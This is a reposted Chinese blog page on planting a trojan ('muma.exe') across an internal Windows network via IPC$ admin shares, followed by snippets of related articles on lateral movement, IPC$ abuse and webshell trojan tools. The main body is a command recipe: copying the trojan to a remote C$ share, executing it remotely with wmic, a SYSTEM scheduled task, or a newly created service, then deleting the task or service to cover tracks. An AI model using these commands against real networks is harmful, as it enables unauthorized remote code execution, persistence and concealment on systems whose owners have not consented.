内网IPC$种马的三种方法

最新推荐文章于 2024-01-28 23:28:45 发布
最新推荐文章于 2024-01-28 23:28:45 发布
阅读量181 收藏
点赞数
原文链接:http://www.cnblogs.com/dongchi/p/4584225.html
版权 
copy muma.exe \\host\c$\windows\temp\foobar.exe     ##IPC拷贝木马文件
 

WMIC远程运行命令

wmic /node:host /user:administrator /p 密码 process call create “c:\windows\temp\foobar.exe” 
 

schtasks计划任务远程运行

schtasks /create /tn foobar /tr c:\windows\temp\foobar.exe /sc once /st 00:00            /S host /RU System 

schtasks /run /tn foobar /S host 

schtasks /F /delete /tn foobar /S host ##清除schtasks
 

SC添加服务远程运行命令

sc \\host create foobar binpath=“c:\windows\temp\foobar.exe”    ##新建服务,指向拷贝的木马路径 

sc \\host start foobar        ##启动建立的服务 
sc \\host delete foobar    ##完事后删除服务

  

转载于:https://www.cnblogs.com/dongchi/p/4584225.html

内网渗透 IPC$ [空连接]
战神/calmness的博客
09-30 2899
IPC$概念 IPC$(Internet Process Connection)是共享”命名管道”的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用; IPC$作用 利用IPC$,连接者甚至可以与目标主机建立一个连接,利用这个连接,连接者可以得到目标主机上的目录结构、用户列表等信息。 IPC$利用条件 139,445端口开启 ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用
内网渗透-内网横向移动的九种方式
lza20001103的博客
08-26 1966
内网横向移动的九种方式 文章目录内网横向移动的九种方式实验环境1.IPC横向1.1 利用条件1.2 命令2.WMI横向2.1利用条件2.2wmic2.3 cscript2.4 wmiexec3.smb横向3.1 利用条件3.2 psexec(微软官方工具)3.3 psexec(impacket工具)3.4 smbexec4.密码喷洒4.1利用metasploit进行密码喷洒5.PTH-哈希传递5.1 利用条件5.2 MiMiKatz-PTH6.PTK-mimiKatZ761 利用条件7.PtT-票据传递(m
内网渗透_IPC
qq_42383069的博客
04-07 5324
内网渗透_IPC 0x01. 什么是IPC IPC(共享命名管道资源)其实就是为了实现进程间通信而开放的命名管道;IPC可以通过验证用户名和密码获得相应的权限,通常在远程管理计算机和查看计算机的共享资源使用 简单理解:可以访问目标机器上的文件(上传、下载),也可以在目标标机器上运行命令 上传和下载文件直接通过 copy 命令就可以,不过路径缓存 UNC 路径 什么是UNC路径?就是以 \ 开头的路径就是UNC路径,比如:\\10.10.10.10\c$\users 0x02. IPC的利用条件 开启了1
内网安全:IPC协议横向移动
qq_61553520的博客
01-28 2112
本篇主要介绍内网横向移动的IPC协议利用方式,从命令,工具,脚本自动化多种方式讲解实战攻击思路
内网横向移动—IPC&AT&schtasks
剁椒鱼头没剁椒的博客
06-24 1236
IPC( Internet Process Connection)共享“命名管道”的资源,是为了实现进程间通信而开放的命名管道。IPC可以通过验证用户名和密码获得相应的权限,通常在远程管理计算机和查看计算机的共享资源时使用。通过ipc$,可以与目标机器建立连接。利用这个连接,不仅可以访问目标机器中的文件,进行上传、下载等 操作,还可以在目标机器上运行其他命令,以获取目标机器的目录结构、用户列表等信息。
告诉你黑客如何给你的系统种木马
寒冬玉
12-17 781
  来源:51CTO相信很多朋友都听说过木马程序,总觉得它很神秘、很高难,但事实上随着木马软件的智能化,很多骇客都能轻松达到攻击的目的。今天,笔者就以最新的一款木马程序——黑洞2004,从种植、使用、隐藏、防范四个方面来为网络爱好者介绍一下木马的特性。需要提醒大家的是,在使用木马程序的时候,请先关闭系统中的病毒防火墙,因为杀毒软件会把木马作为病毒的一种进行查杀。  操作步骤  一、种植木马
渗透之——内网IPC$入侵
冰河的专栏
01-07 2602
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/85995503 一、域操作相关的命令 1.查看域用户 net user/domain 2.查看有几个域 net view/domain 3.查看域内的主机 net view/domain: XXX 4.查看域里面的组 net group/domain 5...
WindowsIPC$服务及利用
2ed
11-13 4470
IPC$(Internet Process Connection) 共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。 在WindowsXP windows7等系统中,隐藏着一种据说是可以“致命”的漏洞,它让很多人一听到就谈“虎”色变。在“我的电脑”上右击“管理”,依次...
红尘网安Ipc$【135】全自动扫描【网吧内网专用版】
12-25
"Ipc$"通常指的是IPC$共享,这是一种Windows系统中的命名管道通信机制,常常被黑客用于远程访问和控制。而“135端口”是RPC(Remote Procedure Call)服务使用的端口,也是许多恶意软件和攻击者的目标,因为它们可以...
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&入口差异&切换上线&IPC管道&AT&SC任务&Impacket套件&UI插件
最新发布
06-22
本文将深入探讨“红队内网攻防渗透”,重点介绍内网对抗中的横向移动策略、不同入口差异、上线切换技巧,以及利用IPC管道、AT任务、SC服务、Impacket工具套件和UI插件等技术手段。 首先,横向移动是内网渗透的关键...
木马内网介绍一下常见的木马种类
weixin_34376562的博客
05-19 419
本文是一篇关于木马内网的帖子     目前罕见的木马有三种:正向连接木马、反弹连接木马、收信木马。               正向连接木马,所谓正向,就是在中马者在呆板上开个端口,而我们去连接他的端口。而我们要知道他的IP,才能够连接他。123就是他呆板上开的端口。               由于到现在,宽带上彀(动态IP)和路由器的广泛,这个软件就有很大的缺乏。      ...
PHP WEBSHELL 种马工具
weixin_30950237的博客
11-14 368
拿完webshell 之后 方便种马 利用powershell命令 远程 下载木马并执行 缺点 就是 有些 webshell 权限 不是很高的 是无法 执行系统核心命令的 还有是老版本的Windows 系统 是没有powershell的 Windows08 r2 以上版本的系统才有 此工具是php 种马工具 暂时没添加jsp 种马 工具使用 : 输入 php w...
网络安全基础(木马、概述、冰河木马实验)
Pluto.的博客
12-10 4598
文章目录网络安全基础一、木马1. 概述2. 特性3. 组成4. 危害5. 传播途径6. 模拟实验 网络安全基础 一、木马 1. 概述 木马通常成为黑客程序,恶意代码,也称特洛伊木马,是一个基于远程控制的黑客工具,木马程序表面上是无害的,甚至对没有警戒的用户还颇有吸引力,它们经常隐藏在游戏或图形软件中,但它们却隐藏着恶意。 2. 特性 隐蔽性 将自己伪装成合法应用程序,使得用户难以识别,这是木马病毒的首要也是重要的特征。 潜伏性 木马病毒隐蔽的主要手段是欺骗,经常使用伪装的手段将自己合法化。例如,使用合法的
内网横向方法总结
不曾扬帆,何以至远方
06-23 2466
内网横向渗透方法总结
使用IPC扫描器进行网络扫描
gezongbo的博客
04-07 1406
一、实验目的及要求 实验目的:本实验主要学习使用扫描工具进行网络扫描 二、实验仪器设备与软件环境 实验仪器设备:计算机 实验环境:Windows 2000 Server、VMware 三、实验过程及实验结果分析 网络上存在大量具有各种漏洞的主机,使用扫描工具,我们可以扫描到网络上主机的漏洞。 1、使用IPC扫描器在网络上进行扫描 (1) 双击打开scanipc.exe (2)确定要扫描的IP地址范围,例如:192.168.0.1—192.168.0.254 将其填入开始和结束IP里。 (3)在配置里,我们
内网渗透之IPC,远程执行
weixin_30699741的博客
01-23 783
开启服务 net start Schedule net start wmiApSrv 关闭防火墙 net stop sharedaccess net use \\目标IP\ipc$ "" /user:"administrator"进行连接 net use \\目标IP\ipc$ 试环境:主机(windows XP sp3)与windows XP sp2虚拟机)通...
内网之横向移动之IPC
shy的博客
11-11 2062
一,IPC IPC(Internet Process Connection)共享命名管道的资源,是为了实现进程间通信而开放的命名管道。IPC可以通过验证用户名和密码获得相应的权限。 二,ipc$与空连接,139,445端口,默认共享的关系 1,ipc$与空连接: 不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了. 许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口
【网络安全学习实践】Windows环境下针对445端口漏洞爆破IPC$链接进行木马植入的模拟与防护
bay_Tong桐小白的博客
12-19 3165
Windows环境下针对445端口漏洞爆破IPC$链接进行木马植入的模拟与防护,本实践模拟简单的黑客木马入侵,旨在理解木马入侵的原理与过程,并针对性做出防范与部署
内网安全:三种认证技术对比及防护策略
本篇文章主要讨论了三种不同的认证技术在内网安全中的应用和比较,包括WEB/PORTAL、PPPOE和802.1x。首先,让我们逐一分析这些认证技术的特点: 1. **WEB/PORTAL** - 这是一种厂家私有的认证方式,通常用于Web访问...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值